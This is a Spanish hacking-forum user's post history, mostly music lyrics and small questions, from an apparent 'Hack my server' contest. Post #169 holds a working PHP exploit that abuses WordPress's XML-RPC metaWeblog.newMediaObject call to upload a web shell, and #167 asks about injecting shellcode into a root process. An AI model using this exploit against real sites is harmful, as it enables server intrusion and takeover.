Regla N°1:Todo hacker es autodidacta por naturaleza.
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#161
Análisis y Diseño de Malware / Re: Busco maestro soy rápido en aprender
6 Agosto 2014, 22:11 PM #162
Hacking / Re: Hack my server II
6 Agosto 2014, 00:45 AMCita de: dimitrix en 6 Agosto 2014, 00:37 AM
Fue divertido mientras duró, pero según palabras de OVH: Sois un peligro para sus instalaciones y han cancelado el server.
Haré un reporte, reparto de puntos y al próximo hablaré con la empresa antes de hacer nada...
Nos vemos en Hack My Server III
(El próximo será más complicado)
[youtube=640,360]http://www.youtube.com/watch?v=nivQIgk2EKk [/youtube]
Je!
No pudimos tocar el server... We can't touch this?
[youtube=640,360]http://www.youtube.com/watch?v=otCpCn0l4Wo[/youtube]
#163
GNU/Linux / WGET Problema
5 Agosto 2014, 23:09 PM
Queria saber si se puede descargar un archivo a un servidor remoto.
Por ejemplo: wget -c http://bajobasura.com/descarga.pdf . Esto me lo descarga a mi maquina. La idea es descargar a una maquina que se encuentra en mi lan.
Saludos.
Por ejemplo: wget -c http://bajobasura.com/descarga.pdf . Esto me lo descarga a mi maquina. La idea es descargar a una maquina que se encuentra en mi lan.
Saludos.
#164
Foro Libre / Nerdcore
5 Agosto 2014, 20:10 PM
Conozcan a este cantante
[youtube=640,360]http://www.youtube.com/watch?v=FoUWHfh733Y[/youtube]
Even out settle score quick
My disaster recovery requires even more disks
Put your bytes up, prove it or you forfeit
Got my C64 and we blew it into orbit.
M. Bison with eight straight perfects
Overload emotions make hate, break circuits
In case you heard, it's a name fake service
Optimize our runtime to escape verdicts
Got an integer scope flow
That they can't sign
Passing code, didn't sanitize
Command lines; land mine
So before, they'll see me after
I'm Advice dog,
Courage Wolf,
Plus Philosoraptor
Don't prove we're human unless we really hafta
My team built schemes that destroyed recaptcha
Hate what they see, finish this chapter
By the way we're not any geeks, we hack into NASA
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Got this Vodka and this Redbull
They still give me wings
So we Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Zero through Three
We're in every single ring
I'm just waiting until my blackberry dies
Cause I'll replace it with a raspberry pi
Don't compare to this track
It makes everything they said dull
Neutralize any threat
Turn Red skull to dev null
They killed virus writers that we mentioned
But instead they ascended to the VXHeavens
To reincarnate as live wires
Still inside we hide ciphers in signed device drivers
Which school will we hit next?
They didn't learn the format
So we've gotta printf
Next step is a chin check
Freestyles that I spit best
They didn't decrypt yet
I crush internet MC's in rhyme battles
Get your WiFi tackled
Hak5 Pineapple
I don't think you'll like my snapple
Cause I popped it with vodka
And a cyanide capsule
We Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Got this Vodka and this Redbull
They still give me wings
So we Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
First we Drink all the booze
Then we Hack all the things
Then backdoor the firmware
On anything you bring
Regardless of the hardware, service, or encoding
Connected it to the internet
And someone's gonna own it
This is for the pirates who clap
And love the sound
Attacking from the cloud
Then we're back in underground
There's no masking from us now
We pop Tor nodes around the globe
Track and hunt you down
Hacked on schedule, add it to your calendar
Devices online; here comes another challenger
State infiltrated, so undercover
This is for my comrades who stare at their debuggers
And trace every buffer
Examining the code flow
Haven't been to sleep? Better pop another No-Doz
I think I'll need a planet sized urn
Cause some men just wanna see the world burn
Your turn
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Got this Vodka and this Redbull
They still give me wings
So we Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Zero through Three
We're in every single ring
[youtube=640,360]http://www.youtube.com/watch?v=FoUWHfh733Y[/youtube]
Even out settle score quick
My disaster recovery requires even more disks
Put your bytes up, prove it or you forfeit
Got my C64 and we blew it into orbit.
M. Bison with eight straight perfects
Overload emotions make hate, break circuits
In case you heard, it's a name fake service
Optimize our runtime to escape verdicts
Got an integer scope flow
That they can't sign
Passing code, didn't sanitize
Command lines; land mine
So before, they'll see me after
I'm Advice dog,
Courage Wolf,
Plus Philosoraptor
Don't prove we're human unless we really hafta
My team built schemes that destroyed recaptcha
Hate what they see, finish this chapter
By the way we're not any geeks, we hack into NASA
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Got this Vodka and this Redbull
They still give me wings
So we Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Zero through Three
We're in every single ring
I'm just waiting until my blackberry dies
Cause I'll replace it with a raspberry pi
Don't compare to this track
It makes everything they said dull
Neutralize any threat
Turn Red skull to dev null
They killed virus writers that we mentioned
But instead they ascended to the VXHeavens
To reincarnate as live wires
Still inside we hide ciphers in signed device drivers
Which school will we hit next?
They didn't learn the format
So we've gotta printf
Next step is a chin check
Freestyles that I spit best
They didn't decrypt yet
I crush internet MC's in rhyme battles
Get your WiFi tackled
Hak5 Pineapple
I don't think you'll like my snapple
Cause I popped it with vodka
And a cyanide capsule
We Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Got this Vodka and this Redbull
They still give me wings
So we Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
First we Drink all the booze
Then we Hack all the things
Then backdoor the firmware
On anything you bring
Regardless of the hardware, service, or encoding
Connected it to the internet
And someone's gonna own it
This is for the pirates who clap
And love the sound
Attacking from the cloud
Then we're back in underground
There's no masking from us now
We pop Tor nodes around the globe
Track and hunt you down
Hacked on schedule, add it to your calendar
Devices online; here comes another challenger
State infiltrated, so undercover
This is for my comrades who stare at their debuggers
And trace every buffer
Examining the code flow
Haven't been to sleep? Better pop another No-Doz
I think I'll need a planet sized urn
Cause some men just wanna see the world burn
Your turn
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Got this Vodka and this Redbull
They still give me wings
So we Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Drink all the booze
Hack all the things
Zero through Three
We're in every single ring
#165
Hacking / Re: Hack my server II
5 Agosto 2014, 19:54 PM
Mientras tanto , en rusia:
[youtube=640,360]http://www.youtube.com/watch?v=-F-JfWqMG6g[/youtube]
Я сошла́ с ума́,
Я сошла́ с ума́,
Мне нужна́ она́,
Мне нужна́ она́,
Мне нужна́ она́...
Я сошла́ с ума́...
Меня́ по́лностью нет
Абсолю́тно всерьёз,
Ситуа́ция HELP,
Ситуа́ция SOS.
Я себя́ не пойму́:
Ты отку́да взяла́сь?
Почему́, почему́
На тебя́ повела́сь?
Выключа́ется свет,
Я куда́-то лечу́;
Без тебя́ меня́ нет,
Ничего́ не хочу́.
Э́то ме́дленный яд,
Э́то сво́дит с ума́,
А они́ говоря́т:
"Винова́та сама́".
А они́ говоря́т:
"Винова́та сама́".
Я сошла́ с ума́,
Я сошла́ с ума́,
Мне нужна́ она́,
Мне нужна́ она́,
Мне нужна́ она́...
Я сошла́ c ума́,
Мне нужна́ она́!
Без тебя́ я - не я,
Без тебя́ меня́ нет,
А они́ говоря́т,
Говоря́т: "Э́то бред".
Э́то со́лнечный яд -
Золоты́е лучи́,
А они́ говоря́т:
"На́до сро́чно лечи́ть".
Я хоте́ла забы́ть
До упо́ра и вниз,
Я счита́ла столбы́
И расте́рянных птиц.
Без тебя́ меня́ нет,
Отпусти́, отпусти́,
До угла́ по стене́,
Ма́ма, па́па, прости́!
Я сошла́ с ума́,
Я сошла́ с ума́,
Мне нужна́ она́,
Мне нужна́ она́,
Мне нужна́ она́...
Я сошла́ c ума́,
Мне нужна́ она́!
Раз, два, по́сле пяти́,
Ма́ма, па́па, прости́,
Я сошла́ с ума́.
Раз, два, по́сле пяти́,
Ма́ма, па́па, прости́,
Я сошла́ с ума́.
Я сошла́ с ума́,
Я сошла́ с ума́,
Мне нужна́ она́,
Мне нужна́ она́,
Мне нужна́ она́...
Я сошла́ c ума́,
Мне нужна́ она́!
[youtube=640,360]http://www.youtube.com/watch?v=maoAFT61n6M[/youtube]
[youtube=640,360]http://www.youtube.com/watch?v=-F-JfWqMG6g[/youtube]
Я сошла́ с ума́,
Я сошла́ с ума́,
Мне нужна́ она́,
Мне нужна́ она́,
Мне нужна́ она́...
Я сошла́ с ума́...
Меня́ по́лностью нет
Абсолю́тно всерьёз,
Ситуа́ция HELP,
Ситуа́ция SOS.
Я себя́ не пойму́:
Ты отку́да взяла́сь?
Почему́, почему́
На тебя́ повела́сь?
Выключа́ется свет,
Я куда́-то лечу́;
Без тебя́ меня́ нет,
Ничего́ не хочу́.
Э́то ме́дленный яд,
Э́то сво́дит с ума́,
А они́ говоря́т:
"Винова́та сама́".
А они́ говоря́т:
"Винова́та сама́".
Я сошла́ с ума́,
Я сошла́ с ума́,
Мне нужна́ она́,
Мне нужна́ она́,
Мне нужна́ она́...
Я сошла́ c ума́,
Мне нужна́ она́!
Без тебя́ я - не я,
Без тебя́ меня́ нет,
А они́ говоря́т,
Говоря́т: "Э́то бред".
Э́то со́лнечный яд -
Золоты́е лучи́,
А они́ говоря́т:
"На́до сро́чно лечи́ть".
Я хоте́ла забы́ть
До упо́ра и вниз,
Я счита́ла столбы́
И расте́рянных птиц.
Без тебя́ меня́ нет,
Отпусти́, отпусти́,
До угла́ по стене́,
Ма́ма, па́па, прости́!
Я сошла́ с ума́,
Я сошла́ с ума́,
Мне нужна́ она́,
Мне нужна́ она́,
Мне нужна́ она́...
Я сошла́ c ума́,
Мне нужна́ она́!
Раз, два, по́сле пяти́,
Ма́ма, па́па, прости́,
Я сошла́ с ума́.
Раз, два, по́сле пяти́,
Ма́ма, па́па, прости́,
Я сошла́ с ума́.
Я сошла́ с ума́,
Я сошла́ с ума́,
Мне нужна́ она́,
Мне нужна́ она́,
Мне нужна́ она́...
Я сошла́ c ума́,
Мне нужна́ она́!
[youtube=640,360]http://www.youtube.com/watch?v=maoAFT61n6M[/youtube]
#167
Hacking / Re: Hack my server II
3 Agosto 2014, 09:29 AM
Pregunta : ¿Hay alguna forma de crear un hilo en un proceso remoto como en windows?Me refiero a CreateRemoteThread() . Tratar de escribir en un proceso remoto que sea root y ejecutar un createremotethread desde el lugar que escribimos en ese proceso remoto y asi ejecutar una shellcode.
Esto lo hize en windows , no tengo idea si se puede en GNU/Linux.
Esto lo hize en windows , no tengo idea si se puede en GNU/Linux.
#168
Hacking / Re: Hack my server II
3 Agosto 2014, 08:39 AM
/vz/vms/84472/private on / type simfs (rw,relatime)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
none on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600,ptmxmode=000)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec,relatime)
none on /sys/fs/cgroup type tmpfs (rw,relatime,size=4k,mode=755)
none on /run type tmpfs (rw,nosuid,noexec,relatime,size=104860k,mode=755)
none on /dev/shm type tmpfs (rw,relatime)
none on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
none on /run/shm type tmpfs (rw,nosuid,nodev,relatime)
none on /run/user type tmpfs (rw,nosuid,nodev,noexec,relatime,size=102400k,mode=755)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
none on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600,ptmxmode=000)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec,relatime)
none on /sys/fs/cgroup type tmpfs (rw,relatime,size=4k,mode=755)
none on /run type tmpfs (rw,nosuid,noexec,relatime,size=104860k,mode=755)
none on /dev/shm type tmpfs (rw,relatime)
none on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
none on /run/shm type tmpfs (rw,nosuid,nodev,relatime)
none on /run/user type tmpfs (rw,nosuid,nodev,noexec,relatime,size=102400k,mode=755)
#169
Hacking / Re: Hack my server II
3 Agosto 2014, 04:21 AM
Bueno , voy a explicar algo que desconocia y que descubri buscando formas diferentes de subir shell.
Luego de poder entrar via SQLi ya sea desde el wordpress o el phpmyadmin ,empeze a buscar otras formas. Leyendo el source de wordpress , encontre un archivo muy lindo llamado xmlrpc.php(No lo pongo porque no me deja poner mucho texto)
Despues de leerlo todo , no lo podia creer lo servido que estaba.
Observemos esta funcion:
Sisi muchachos , hace un upload! Entonces simplemente creo un exploit...
Class-IXR.php lo pueden encontrar en wordpress. No lo voy a postear.
Bueno , aprendi algo nuevo y lo comparto.Y encima repase algo de php que estaba bastante oxidado.
Luego de poder entrar via SQLi ya sea desde el wordpress o el phpmyadmin ,empeze a buscar otras formas. Leyendo el source de wordpress , encontre un archivo muy lindo llamado xmlrpc.php(No lo pongo porque no me deja poner mucho texto)
Despues de leerlo todo , no lo podia creer lo servido que estaba.
Observemos esta funcion:
Código (php) [Seleccionar]
/* metaweblog.newMediaObject uploads a file, following your settings */
function mw_newMediaObject($args) {
// adapted from a patch by Johann Richard
// http://mycvs.org/archives/2004/06/30/file-upload-to-wordpress-in-ecto/
global $wpdb;
$blog_ID = $wpdb->escape($args[0]);
$user_login = $wpdb->escape($args[1]);
$user_pass = $wpdb->escape($args[2]);
$data = $args[3];
$name = $data['name'];
$type = $data['type'];
$bits = $data['bits'];
logIO('O', '(MW) Received '.strlen($bits).' bytes');
if ( !$this->login_pass_ok($user_login, $user_pass) )
return $this->error;
set_current_user(0, $user_login);
if ( !current_user_can('upload_files') ) {
logIO('O', '(MW) User does not have upload_files capability');
$this->error = new IXR_Error(401, 'You are not allowed to upload files to this site.');
return $this->error;
}
$upload = wp_upload_bits($name, $type, $bits);
if ( ! empty($upload['error']) ) {
logIO('O', '(MW) Could not write file '.$name);
return new IXR_Error(500, 'Could not write file '.$name);
}
return array('url' => $upload['url']);
}
Sisi muchachos , hace un upload! Entonces simplemente creo un exploit...
Código (php) [Seleccionar]
<?php
include_once("class-IXR.php");
echo "Exploit para concurso de elhacker.net";
$cliente=new IXR_CLIENT('http://IP/xmlrpc.php');
$tamano=filesize('shell.php');
$archivo=fopen('shell.php','rb');
$data=fread($archivo,$tamano);
fclose($archivo);
$shell=array(
'name'=>"shell.php",
'type'=>"application/php",
'bits'=>new IXR_Base64($data)
);
$cliente->query('metaWeblog.newMediaObject',array(
0,
"ret2libc",
"password",
$shell
));
print_r($cliente->getResponse());
echo "Check bitch!";
?>
Class-IXR.php lo pueden encontrar en wordpress. No lo voy a postear.
Bueno , aprendi algo nuevo y lo comparto.Y encima repase algo de php que estaba bastante oxidado.